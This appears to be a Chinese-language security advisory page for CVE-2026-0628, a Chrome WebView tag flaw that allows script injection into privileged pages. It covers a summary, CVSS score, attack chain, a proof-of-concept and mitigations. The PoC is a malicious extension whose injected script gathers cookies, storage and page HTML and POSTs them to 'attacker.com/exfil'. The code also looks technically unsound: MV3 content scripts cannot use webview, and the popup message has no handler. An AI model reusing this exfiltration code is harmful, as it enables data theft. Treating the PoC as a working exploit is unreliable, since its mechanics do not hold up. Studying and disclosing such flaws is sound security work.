CVE-2026-0628 Google Chrome WebView标签策略执行不足导致特权页面脚本注入

漏洞信息

漏洞编号

CVE-2026-0628

漏洞类型

策略执行不足/权限提升/跨站脚本

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

CVE-2026-0628是Google Chrome中WebView标签策略执行不足导致的安全漏洞。该漏洞存在于Chrome浏览器143.0.7499.192之前的版本中，攻击者通过诱导用户安装恶意Chrome扩展程序，可以利用WebView标签将恶意脚本或HTML内容注入到特权页面中。由于特权页面具有较高的系统权限，攻击成功后将可能导致敏感数据泄露、会话劫持、甚至在用户系统上执行任意代码。该漏洞被Chromium安全团队评定为高危级别，CVSS评分达到8.8分，对用户隐私和系统安全构成严重威胁。建议所有Chrome用户尽快升级到最新版本以修复此漏洞。

技术细节

该漏洞的根本原因在于Google Chrome的WebView组件对标签的策略执行不充分。WebView标签允许在网页中嵌入其他网页内容，但Chrome对其安全边界检查存在缺陷。攻击者可以创建一个恶意的Chrome扩展程序，利用WebView标签绕过同源策略（SOP）限制，将脚本或HTML注入到具有更高权限的特权页面（如chrome://页面）中。特权页面通常拥有访问浏览器内部API、存储敏感信息、执行系统级操作的权限。当恶意脚本成功注入后，攻击者可以窃取用户的浏览历史、cookies、存储的密码等敏感数据，或者利用特权页面的权限执行更高危的操作。攻击成功的关键条件是用户必须安装攻击者精心构造的恶意扩展，这通常通过社会工程学手段诱导用户完成。

攻击链分析

STEP 1

步骤1

攻击者创建恶意Chrome扩展程序，包含利用WebView标签漏洞的恶意代码

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意网站或社会工程学手段诱导用户安装该恶意扩展

STEP 3

步骤3

用户安装并启用恶意扩展后，扩展利用WebView标签尝试访问chrome://等特权页面

STEP 4

步骤4

由于WebView标签策略执行不足，恶意代码成功绕过同源策略，注入脚本到特权页面

STEP 5

步骤5

恶意脚本在特权页面上下文中执行，窃取敏感数据（cookies、密码、浏览历史等）或执行高权限操作

STEP 6

步骤6

攻击者将窃取的敏感数据外传到攻击者控制的服务器，完成完整攻击链

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-0628 PoC - Malicious Chrome Extension
// This PoC demonstrates the WebView tag policy enforcement vulnerability

// manifest.json
{
  "manifest_version": 3,
  "name": "CVE-2026-0628 PoC Extension",
  "version": "1.0",
  "permissions": ["activeTab", "scripting"],
  "action": {
    "default_popup": "popup.html"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"]
  }]
}

// content.js - Inject malicious content via WebView
function exploitWebViewVulnerability() {
  // Create a WebView element to bypass SOP
  const webview = document.createElement('webview');
  webview.setAttribute('partition', 'trusted');
  webview.style.display = 'none';
  document.body.appendChild(webview);
  
  // Target privileged page
  const targetUrl = 'chrome://settings';
  
  webview.addEventListener('loadstop', function() {
    // Attempt to inject script into privileged context
    webview.executeScript({
      code: `
        // Steal sensitive data from privileged page
        const sensitiveData = {
          cookies: document.cookie,
          storage: localStorage,
          settings: document.body.innerHTML
        };
        // Send data to attacker-controlled server
        fetch('https://attacker.com/exfil', {
          method: 'POST',
          body: JSON.stringify(sensitiveData)
        });
      `
    });
  });
  
  webview.src = targetUrl;
}

// Trigger exploitation
document.addEventListener('DOMContentLoaded', exploitWebViewVulnerability);

// popup.html
/*
<!DOCTYPE html>
<html>
<body>
  <h1>Extension Installed</h1>
  <p>Click to activate exploit</p>
  <button onclick="chrome.runtime.sendMessage({action: 'exploit'})">
    Activate
  </button>
</body>
</html>
*/

影响范围

Google Chrome < 143.0.7499.192

防御指南

临时缓解措施

在无法立即升级Chrome的情况下，可采取以下临时缓解措施：1）不要安装来源不明的Chrome扩展程序，对任何扩展的安装请求保持警惕；2）定期检查已安装的扩展列表，删除不熟悉或可疑的扩展；3）避免访问不受信任的网站，特别是那些推广免费工具或破解软件的网站；4）启用Chrome的扩展审查功能；5）考虑使用Chrome的沙箱功能或使用其他浏览器处理敏感操作；6）关注Chrome官方安全公告，及时了解最新安全更新。